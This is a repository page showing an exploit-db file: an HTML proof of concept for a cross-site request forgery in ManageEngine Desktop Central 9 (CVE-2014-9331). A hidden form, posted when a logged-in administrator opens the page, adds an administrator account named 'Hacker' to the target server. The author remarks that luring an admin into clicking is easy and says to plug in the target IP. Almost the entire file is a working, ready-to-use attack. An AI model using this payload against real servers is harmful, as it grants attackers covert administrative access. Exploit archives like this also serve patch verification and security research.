bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/multiple/webapps/35980.html
Offensive Security 7fe14b4b98 Update: 2015-02-05 
30 new exploits
2015-02-05 08:37:11 +00:00

45 lines
2.5 KiB
HTML
Executable file
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

<html>
<!--
# Exploit Title: ManageEngine Desktop Central 9 Add and admin user through Cross-Site Request Forgery (CSRF)
# Date: 05 December 2014
# Exploit Author: Mohamed Idris Help AG Middle East
# Vendor Homepage: http://www.manageengine.com/
# Software Link: http://www.manageengine.com/products/desktop-central/
# Version: All versions below build 90121
# Tested on: Version 9 Build 90087
# CVEID: CVE-2014-9331
# Vulnerability Fix: http://www.manageengine.com/products/desktop-central/cve20149331-cross-site-request-forgery.html
POC Code:
When an authenticated application admin clicks a link to the below code, you well get a user “Hacker” with the password “HackerPass” added to the application (convincing the admin to click on a link is so easy ;)).
Remember to change the IP to the target server IP address in the code.
-->
<!-- CSRF PoC - Add an admin account -->
<body>
<form action="http://<Server-IP>:8020/STATE_ID/1417736606982/roleMgmt.do?actionToCall=addUser&SUBREQUEST=XMLHTTP" method="POST">
<input type="hidden" name="AuthenticationType" value="DC" />
<input type="hidden" name="newDCAuthUserName" value="Hacker" />
<input type="hidden" name="newDCAuthUserPassword" value="HackerPass" />
<input type="hidden" name="DCAuthconfirmPassword" value="HackerPass" />
<input type="hidden" name="newDCAuthUserEmail" value="" />
<input type="hidden" name="newDCAuthUserPNumber" value="" />
<input type="hidden" name="newADAuthUserEmail" value="" />
<input type="hidden" name="newADAuthUserPNumber" value="" />
<input type="hidden" name="MapType" value="ALL" />
<input type="hidden" name="aduserSearch" value="" />
<input type="hidden" name="searchValue" value="Search" />
<input type="hidden" name="aduserSearchRO" value="" />
<input type="hidden" name="searchValue" value="Search" />
<input type="hidden" name="action1" value="DC_ADD_USER" />
<input type="hidden" name="addUser" value="Add User" />
<input type="hidden" name="cancle" value="Cancel" />
<input type="hidden" name="customerids" value="" />
<input type="hidden" name="roleListDCAuth" value="1" />
<input type="hidden" name="PERSONALISE_LANGUAGE" value="en_US" />
<input type="hidden" name="domainListADAuth" value="-1" />
<input type="hidden" name="roleListADAuth" value="-1" />
<input type="hidden" name="PERSONALISE_LANGUAGE" value="en_US" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Reference in a new issue View git blame Copy permalink